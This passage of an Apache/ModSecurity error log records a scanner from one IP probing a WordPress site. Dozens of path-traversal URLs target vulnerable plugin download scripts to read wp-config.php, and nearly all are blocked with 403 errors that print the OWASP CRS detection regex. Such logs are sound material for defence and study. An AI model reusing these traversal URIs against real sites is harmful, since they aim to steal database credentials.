"OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-filemanager/incl/libfile.php"] [unique_id "Y0ZxSOLrJ0tgpRmNRAaHgwAAAM4"] [Wed Oct 12 02:48:24.782193 2022] [:error] [pid 22972:tid 140534589232896] [client 185.189.115.30:49768] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-imagezoom/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-imagezoom/download.php"] [unique_id "Y0ZxSOLrJ0tgpRmNRAaHhAAAAME"] [Wed Oct 12 02:48:24.933745 2022] [:error] [pid 22972:tid 140534425290496] [client 185.189.115.30:49770] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-lytebox/main.php?pg=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-lytebox/main.php"] [unique_id "Y0ZxSOLrJ0tgpRmNRAaHhQAAAMw"] [Wed Oct 12 02:48:25.083872 2022] [:error] [pid 22972:tid 140534433683200] [client 185.189.115.30:49772] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-miniaudioplayer/map_download.php?fileurl=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-miniaudioplayer/map_download.php"] [unique_id "Y0ZxSeLrJ0tgpRmNRAaHhgAAAMs"] [Wed Oct 12 02:48:25.234716 2022] [:error] [pid 22972:tid 140534475646720] [client 185.189.115.30:49774] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-mon/assets/download.php?type=octet%2Fstream&path=..%2F..%2F..%2F..%2F&name=wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-mon/assets/download.php"] [unique_id "Y0ZxSeLrJ0tgpRmNRAaHhwAAAMY"] [Wed Oct 12 02:48:25.391372 2022] [:error] [pid 22972:tid 140534450468608] [client 185.189.115.30:49776] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-publication-archive/includes/openfile.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-publication-archive/includes/openfile.php"] [unique_id "Y0ZxSeLrJ0tgpRmNRAaHiAAAAMk"] [Wed Oct 12 02:48:25.542987 2022] [:error] [pid 22339:tid 140534332970752] [client 185.189.115.30:49778] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-source-control/downloadfiles/download.php?path=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-source-control/downloadfiles/download.php"] [unique_id "Y0ZxSdmZws0mEkXxGo-VMQAAAJc"] [Wed Oct 12 02:48:25.706446 2022] [:error] [pid 22972:tid 140534391719680] [client 185.189.115.30:49782] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-swimteam/include/user/download.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-swimteam/include/user/download.php"] [unique_id "Y0ZxSeLrJ0tgpRmNRAaHiQAAANA"] [Wed Oct 12 02:48:25.864001 2022] [:error] [pid 22337:tid 140534425290496] [client 185.189.115.30:49784] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-table/js/wptable-button.phpp?wpPATH=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-table/js/wptable-button.phpp"] [unique_id "Y0ZxSaBKlkjFPqrcdjM3pAAAAAw"] [Wed Oct 12 02:48:26.070774 2022] [:error] [pid 22338:tid 140534425290496] [client 185.189.115.30:49786] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php"] [unique_id "Y0ZxSmINFIoIk7hPzpaZHgAAAEw"] [Wed Oct 12 02:48:26.221879 2022] [:error] [pid 22337:tid 140534416897792] [client 185.189.115.30:49788] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wpeasystats/export.php?homep=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wpeasystats/export.php"] [unique_id "Y0ZxSqBKlkjFPqrcdjM3pQAAAA0"] [Wed Oct 12 02:48:26.380842 2022] [:error] [pid 22972:tid 140534374934272] [client 185.189.115.30:49790] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php"] [unique_id "Y0ZxSuLrJ0tgpRmNRAaHigAAANI"] [Wed Oct 12 02:48:26.534262 2022] [:error] [pid 22972:tid 140534458861312] [client 185.189.115.30:49792] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/zingiri-forum/mybb/memberlist.php?language=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/zingiri-forum/mybb/memberlist.php"] [unique_id "Y0ZxSuLrJ0tgpRmNRAaHiwAAAMg"] [Wed Oct 12 02:48:26.704695 2022] [:error] [pid 22972:tid 140534324578048] [client 185.189.115.30:49794] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/zingiri-web-shop/fws/ajax/init.inc.php?wpabspath=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/zingiri-web-shop/fws/ajax/init.inc.php"] [unique_id "Y0ZxSuLrJ0tgpRmNRAaHjAAAANg"] [Wed Oct 12 02:48:26.901822 2022] [:error] [pid 22337:tid 140534450468608] [client 185.189.115.30:49796] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/investig/public_html/wp-includes/functions.php on line 8 [Wed Oct 12 02:48:26.901989 2022] [:error] [pid 22337:tid 140534450468608] [client 185.189.115.30:49796] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/investig/public_html/wp-includes/functions.php on line 8 [Wed Oct 12 02:48:26.902100 2022] [:error] [pid 22337:tid 140534450468608] [client 185.189.115.30:49796] PHP Warning: require(ABSPATHWPINC/option.php): failed to open stream: No such file or directory in /home/investig/public_html/wp-includes/functions.php on line 8 [Wed Oct 12 02:48:26.902224 2022] [:error] [pid 22337:tid 140534450468608] [client 185.189.115.30:49796] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/option.php' (include_path='.:/usr/local/lib/php') in /home/investig/public_html/wp-includes/functions.php on line 8 [Wed Oct 12 02:48:27.057485 2022] [:error] [pid 22339:tid 140534408505088] [client 185.189.115.30:49798] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/multi-plugin-installer/mpi_download.php?filepath=..%2F..%2F..%2F&filename=wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/multi-plugin-installer/mpi_download.php"] [unique_id "Y0ZxS9mZws0mEkXxGo-VMwAAAI4"] [Wed Oct 12 02:48:27.207826 2022] [:error] [pid 22339:tid 140534425290496] [client 185.189.115.30:49800] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/google-document-embedder/libs/pdf.php?fn=lol.pdf&file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/google-document-embedder/libs/pdf.php"] [unique_id "Y0ZxS9mZws0mEkXxGo-VNAAAAIw"] [Wed Oct 12 02:48:27.396934 2022] [:error] [pid 22337:tid 140534564054784] [client 185.189.115.30:49802] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/file-away/lib/cls/class.fileaway_downloader.php?fileaway=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/file-away/lib/cls/class.fileaway_downloader.php"] [unique_id "Y0ZxS6BKlkjFPqrcdjM3pwAAAAQ"] [Wed Oct 12 02:48:28.391696 2022] [:error] [pid 22972:tid 140534484039424] [client 185.189.115.30:49806] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/document_manager/views/file_download.php?fname=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/document_manager/views/file_download.php"] [unique_id "Y0ZxTOLrJ0tgpRmNRAaHjQAAAMU"] [Wed Oct 12 02:48:28.542891 2022] [:error] [pid 22972:tid 140534400112384] [client 185.189.115.30:49808] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/download-manager/views/file_download.php?fname=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/download-manager/views/file_download.php"] [unique_id "Y0ZxTOLrJ0tgpRmNRAaHjgAAAM8"] [Wed Oct 12 02:48:28.695221 2022] [:error] [pid 22339:tid 140534416897792] [client 185.189.115.30:49810] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php"] [unique_id "Y0ZxTNmZws0mEkXxGo-VNQAAAI0"] [Wed Oct 12 02:48:28.846076 2022] [:error] [pid 22339:tid 140534433683200] [client 185.189.115.30:49812] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/contus-video-gallery/hdflvplayer/download.php?f=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/contus-video-gallery/hdflvplayer/download.php"] [unique_id "Y0ZxTNmZws0mEkXxGo-VNgAAAIs"] [Wed Oct 12 02:48:28.996706 2022] [:error] [pid 22339:tid 140534374934272] [client 185.189.115.30:49814] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/mac-dock-gallery/macdownload.php?albid=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/mac-dock-gallery/macdownload.php"] [unique_id 